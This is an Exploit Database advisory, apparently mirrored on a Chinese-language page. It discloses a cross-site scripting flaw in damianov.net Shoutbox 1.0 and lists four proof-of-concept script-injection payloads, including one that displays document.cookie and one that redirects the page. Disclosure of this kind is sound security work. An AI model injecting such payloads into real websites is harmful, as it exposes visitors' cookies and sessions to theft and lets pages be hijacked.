damianov.net Shoutbox – Cross-Site Scripting

• Exploit Database
• 13 阅读

• 作者： Valentin Hoebel
  日期： 2010-05-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12593/

• # Exploit Title: damianov.net Shoutbox XSS Vulnerability
  # Date: 13.05.2010
  # Author: Valentin
  # Category: webapps/0day
  # Version: 1.0
  # Tested on: Debian, Apache2, PHP5
  # CVE :
  # Code : 
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
  >> General Information 
  Advisory/Exploit Title = damianov.net Shoutbox XSS Vulnerability
  Author = Valentin Hoebel
  Contact = valentin@xenuser.org
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
  >> Product information
  Name = damianov.net Shoutbox
  Vendor = damianov.net
  Vendor Website = http://www.damianov.net/
  Affected Version(s) = 1.0
  
   
  [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
  >> #1 Vulnerability
  Type = XSS
  Injecting arbitrary HTML and Java Script code is possible while adding a new
  shout, no matter if HTML is allowed in the shoutsettings.php or not.
  
  #1 Example: <SCRIPT src=some-script.js></SCRIPT>
  #2 Example: <SCRIPT>alert("XSS")</SCRIPT>
  #3 Example: <SCRIPT>alert(document.cookie)</SCRIPT>
  #4 Example: <script>document.location.href="http://www.google.de"</script>
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
  >> Additional Information
  Advisory/Exploit Published = 13.05.2010
  Solution = Edit code and add filters.
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
  >> Misc
  Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
  <3 packetstormsecurity.org!
  
  
  [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]